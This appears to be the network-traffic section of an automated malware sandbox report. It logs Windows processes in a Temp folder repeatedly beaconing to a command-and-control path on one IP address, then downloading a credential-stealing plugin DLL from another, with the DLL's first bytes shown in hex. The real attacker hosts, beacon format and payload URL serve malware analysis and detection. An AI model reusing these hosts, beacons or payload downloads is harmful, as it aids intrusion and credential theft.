                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      47192.168.2.549861193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:57.932446957 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:58.183828115 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:58.185154915 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:58.445507050 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      48192.168.2.549862193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:58.801763058 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:59.046861887 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:59.048047066 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:59.296912909 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      49192.168.2.549863193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:59.696800947 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:59.948745012 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:59.954314947 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:00.211832047 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      50192.168.2.549864193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:00.577872992 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:00.832135916 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:00.846025944 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:01.101581097 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      51192.168.2.549865193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:01.543850899 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:01.792764902 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:01.794197083 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:02.047658920 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      52192.168.2.549866193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:02.421377897 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:02.672463894 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:02.673408985 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:02.928219080 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      53192.168.2.549867193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:03.282568932 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:03.525332928 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:03.529757977 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:03.777225971 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      54192.168.2.549868193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:03.913847923 CEST66OUTGET /enigma/Plugins/cred64.dll HTTP/1.1
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:04.155072927 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:04 GMT
                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                      Content-Length: 1285632
                                                                                                                                                                                                                                      Last-Modified: Thu, 01 Feb 2024 16:00:36 GMT
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      ETag: "65bbc024-139e00"
                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 de c9 0d 82 bf a7 5e 82 bf a7 5e 82 bf a7 5e d9 d7 a3 5f 91 bf a7 5e d9 d7 a4 5f 92 bf a7 5e d9 d7 a2 5f 32 bf a7 5e 57 d2 a2 5f c4 bf a7 5e 57 d2 a3 5f 8d bf a7 5e 57 d2 a4 5f 8b bf a7 5e d9 d7 a6 5f 8f bf a7 5e 82 bf a6 5e 43 bf a7 5e 19 d1 ae 5f 86 bf a7 5e 19 d1 a7 5f 83 bf a7 5e 19 d1 58 5e 83 bf a7 5e 19 d1 a5 5f 83 bf a7 5e 52 69 63 68 82 bf a7 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 0f bf bb 65 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 18 00 c0 0f 00 00 52 04 00 00 00 00 00 68 06 0d 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 14 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 89 12 00 58 00 00 00 78 89 12 00 8c 00 00 00 00 20 14 00 f8 00 00 00 00 60 13 00 28 ad 00 00 00 00 00 00 00 00 00 00 00 30 14 00 f4 15 00 00 b0 9e 11 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 9f 11 00 08 01 00 00 00 00 00 00 00 00 00 00 00 d0 0f 00 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 be 0f 00 00 10 00 00 00 c0 0f 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e2 cd 02 00 00 d0 0f 00 00 ce 02 00 00 c4 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c bb 00 00 00 a0 12 00 00 44 00 00 00 92 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 28 ad 00 00 00 60 13 00 00 ae 00 00 00 d6 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 94 00 00 00 00 10 14 00 00 02 00 00 00 84 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 f8 00 00 00 00 20 14 00 00 02 00 00 00 86 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f4 15 00 00 00 30 14 00 00 16 00 00 00 88 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$^^^_^_^_2^W_^W_^W_^_^^C^_^_^X^^_^Rich^PEde" RhP` Xx `(0p .text `.rdata@@.dataLD@.pdata(`@@_RDATA@@.rsrc @@.reloc0@B
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:04.155113935 CEST1289INData Raw: 00 00 00 00 48 83 ec 28 41 b8 20 00 00 00 48 8d 15 97 6e 11 00 48 8d 0d e0 bb 12 00 e8 d3 20 0c 00 48 8d 0d 0c 85 0f 00 48 83 c4 28 e9 cf f2 0c 00 cc cc cc 48 83 ec 28 41 b8 20 00 00 00 48 8d 15 8f 6e 11 00 48 8d 0d b0 c2 12 00 e8 a3 20 0c 00 48
